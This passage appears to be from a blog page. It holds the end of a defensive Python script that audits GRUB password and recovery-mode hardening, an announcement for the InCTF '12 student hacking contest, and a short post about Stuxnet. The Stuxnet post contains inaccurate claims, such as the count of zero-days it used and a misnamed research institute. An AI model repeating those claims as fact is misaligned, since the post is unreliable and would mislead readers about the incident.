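        problems.append("recovery mode still enabled")
    superusers, passwords = header_protection(header_text)
    if superusers is None:
        problems.append("no superusers set")
    elif superusers not in passwords:
        problems.append(f"superuser {superusers} has no password_pbkdf2 entry")
    for user, h in passwords.items():
        m = GRUB_HASH_RE.match(h)
        if not m or len(m.group(2)) != 128 or len(m.group(3)) != 128:
            problems.append(f"malformed hash for {user} (pasted across several lines?)")
        elif int(m.group(1)) < 10000:
            problems.append(f"fewer than 10000 PBKDF2 iterations for {user}")
    return problems


# Constructed samples. The hash is generated here from a throwaway password.
EXAMPLE_HASH = make_grub_hash("constructed-password", salt=bytes(range(64)))
STOCK_DEFAULT_GRUB = 'GRUB_DEFAULT=0\n#GRUB_DISABLE_RECOVERY="true"\n'
HARDENED_DEFAULT_GRUB = 'GRUB_DEFAULT=0\nGRUB_DISABLE_RECOVERY="true"\n'
STOCK_HEADER = "cat << EOF\nset timeout=5\nEOF\n"
HARDENED_HEADER = f'cat << EOF\nset superusers="admin"\npassword_pbkdf2 admin {EXAMPLE_HASH}\nEOF\n'
# A hash wrapped onto a second line, as a careless paste leaves it:
WRAPPED_HEADER = f'cat << EOF\nset superusers="admin"\npassword_pbkdf2 admin {EXAMPLE_HASH[:80]}\n{EXAMPLE_HASH[80:]}\nEOF\n'

if __name__ == "__main__":
    print("hardened:", audit(HARDENED_DEFAULT_GRUB, HARDENED_HEADER))
    print("stock:   ", audit(STOCK_DEFAULT_GRUB, STOCK_HEADER))
    print("wrapped: ", audit(HARDENED_DEFAULT_GRUB, WRAPPED_HEADER))
```

To check your own files, pass `open("/etc/default/grub").read()` and `open("/etc/grub.d/00_header").read()` to audit(), and call verify_grub_hash() with the password you typed into grub-mkpasswd-pbkdf2 and the hash line you pasted; an empty problem list and a True from verify mean the reboot will ask for, and accept, the credentials you expect.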


InCTF’12 – National Level Ethical Hacking Contest

September 20, 2011 Leave a comment

Amrita University & TIFAC CORE

proudly present

InCTF '12

A National Level "Capture the Flag" style ethical hacking contest. Not a day passes without several websites being compromised. The latest in the line of compromised websites was http://kernel.org, the home page of the Linux kernel. Several more security incidents go unreported. The security of sensitive data has many implications, ranging from national security issues to defense secrets ending up in the wrong hands, and much more.

Indian websites offer little or no resistance to such security intrusions. The Computer Emergency Response Team, India (CERT-In) has been tracking defacements of Indian websites and more; their report can be viewed here. It is really sad that, with so much talent and skill, Indian websites are compromised frequently and nothing is done to stem this wave of attacks.

InCTF is a Capture the Flag style ethical hacking contest, a strategic war-game designed to mimic real-world security challenges. Software developers in India have little exposure to secure coding practices and to the effects of not adopting them, which is one of the main reasons why systems are compromised so easily these days. Following such simple practices can help prevent such incidents.

InCTF '12 runs from November 2011 to January 2012 and is focused exclusively on the student community. You can participate from your own university; no travel is required. No prior exposure or experience in cyber security is needed to participate.
What you need to do?
1. Form a team (max five members from your college)
2. Approach a faculty/mentor and request him/her to mentor your team
3. Register online at http://inctf.in

In addition, it has been decided that teams which finished in the top 10 places of InCTF 2011 qualify directly for the second round; they do not have to participate in the first round. Congratulations to all these teams!

Great Rewards

25K The winning team receives a cash prize of up to Rs. 25000/-
20K The first runner-up team receives a cash prize of up to Rs. 20000/-
15K The second runner-up team receives a cash prize of up to Rs. 15000/-
10K The third runner-up team receives a cash prize of up to Rs. 10000/-
5K The fourth runner-up team receives a cash prize of up to Rs. 5000/-

See http://inctf.in/prizes for more.

Special Prizes*

  • Teams are awarded prizes based on their performance
  • Deserving teams are well awarded. Exciting prizes to be won.

So, what are you waiting for? It’s simple: Register, Learn, Hack!

Round One:

1. Learning round

2. Contestants have to complete a set of tasks (offline) which will be provided within a given period.

Round Two:

1. Consists of both offline and online tasks

2. Time limit is 3 hrs

3. Top 30 members will be selected for the final round

Round Three:

1. CTF: defend your assigned machine and attack the others' machines.

Registrations starts on November 1st

Keep up with us in:

      Website    Facebook    Twitter

Stuxnet

September 13, 2011 Leave a comment

Stuxnet

Day by day, technology is becoming more sophisticated: the smaller the size, the greater the consequences. As an example, in June last year a computer virus called Stuxnet was found lurking in databanks, power plants, traffic control systems and factories around the world. This virus is 20 times more complex than other viruses. It does not have a contiguous array of capabilities. Stuxnet is a weapon made entirely of code. What can it do? Amazing, when I heard about its effects:

  1. It turns up the pressure in nuclear reactors,
  2. It switches off oil pipelines, and it can report that everything is normal.

It exploited security gaps that the system creators were unaware of. These security holes are known as zero-days, and a zero-day can be sold on the black market for around $100,000. Stuxnet took advantage of 20 zero-days. It is not like other viruses that merely annoy users: this virus has a specific task, and without that it remains dormant. The International Science and International Security (ISIS) says that

1) it can shut down 1000 centrifuges, and

2) it can lead to a national electricity blackout.

Iran has responded to this attack by turning to its hackers, reported as the second largest online army in the world. Some alleged that Israel was behind it, since it contains a reference to the Hebrew Bible, that the US was involved in testing and development, and also Siemens, since its software is used by the Iranian regime. Evolution is fast: nine months after its detection came the first virus that can crash hundreds of power grids or destroy oil pipelines. Just imagine the size of the virus file against the size of its victims.
